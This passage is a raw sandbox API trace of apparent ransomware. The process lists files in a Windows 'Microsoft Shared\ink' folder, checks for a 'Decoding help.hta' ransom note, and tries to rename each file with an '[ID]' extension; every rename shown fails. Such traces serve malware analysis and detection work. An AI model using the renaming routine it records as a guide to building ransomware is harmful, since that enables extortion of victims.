[0052.282] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3db89026, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3db89026, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3d3cc942, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x30c330, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrusalm.dat", cAlternateFileName="")) returned 1 [0052.282] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.282] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.283] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0052.283] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0052.283] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hwrusalm.dat") returned -1 [0052.283] lstrlenW (lpString="hwrusalm.dat") returned 12 [0052.283] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.283] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.283] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="hwrusalm.dat" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" [0052.283] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" [0052.283] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.[ID]g9uZrLhJaygpwRm1[ID]" [0052.283] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.283] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dbfb43d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3dbfb43d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3da7e69b, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x3ee0d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrusash.dat", cAlternateFileName="")) returned 1 [0052.283] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.283] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.283] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0052.283] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0052.283] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hwrusash.dat") returned -1 [0052.283] lstrlenW (lpString="hwrusash.dat") returned 12 [0052.283] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.283] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.283] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="hwrusash.dat" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" [0052.283] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" [0052.284] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.[ID]g9uZrLhJaygpwRm1[ID]" [0052.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.284] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c4bfb78, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x4c4bfb78, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x298e8420, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x56400, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkDiv.dll", cAlternateFileName="")) returned 1 [0052.284] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.284] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.284] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0052.284] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0052.284] lstrcmpiW (lpString1="Decoding help.hta", lpString2="InkDiv.dll") returned -1 [0052.284] lstrlenW (lpString="InkDiv.dll") returned 10 [0052.284] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.284] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.284] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="InkDiv.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll" [0052.284] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll" [0052.284] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0052.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkdiv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkdiv.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.284] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c412911, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c412911, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x29a8c2e0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x201800, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkObj.dll", cAlternateFileName="")) returned 1 [0052.284] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.284] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.285] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0052.285] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0052.285] lstrcmpiW (lpString1="Decoding help.hta", lpString2="InkObj.dll") returned -1 [0052.285] lstrlenW (lpString="InkObj.dll") returned 10 [0052.285] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.285] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.285] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="InkObj.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" [0052.285] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" [0052.285] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0052.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.285] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eab8150, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5eab8150, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe4490e80, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x61000, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkWatson.exe", cAlternateFileName="")) returned 1 [0052.285] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.285] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.285] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0052.285] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0052.285] lstrcmpiW (lpString1="Decoding help.hta", lpString2="InkWatson.exe") returned -1 [0052.285] lstrlenW (lpString="InkWatson.exe") returned 13 [0052.285] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.285] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.285] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="InkWatson.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe" [0052.285] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe" [0052.285] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0052.286] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkwatson.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkwatson.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.370] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7700d105, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x7700d105, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe45c2150, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x5da00, dwReserved0=0x0, dwReserved1=0x0, cFileName="InputPersonalization.exe", cAlternateFileName="")) returned 1 [0052.370] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.371] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.371] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0052.371] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0052.371] lstrcmpiW (lpString1="Decoding help.hta", lpString2="InputPersonalization.exe") returned -1 [0052.371] lstrlenW (lpString="InputPersonalization.exe") returned 24 [0052.371] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.371] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.371] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="InputPersonalization.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe" [0052.371] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe" [0052.371] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0052.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inputpersonalization.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inputpersonalization.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.371] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91865215, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x91865215, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa20, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipscat.xml", cAlternateFileName="")) returned 1 [0052.371] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.371] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.371] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0052.371] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0052.372] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipscat.xml") returned -1 [0052.372] lstrlenW (lpString="ipscat.xml") returned 10 [0052.372] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.372] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.372] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipscat.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" [0052.372] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" [0052.372] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0052.372] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.372] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27bfdab7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27bfdab7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x99e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipschs.xml", cAlternateFileName="")) returned 1 [0052.372] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.372] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.372] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0052.372] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0052.372] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipschs.xml") returned -1 [0052.372] lstrlenW (lpString="ipschs.xml") returned 10 [0052.372] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program 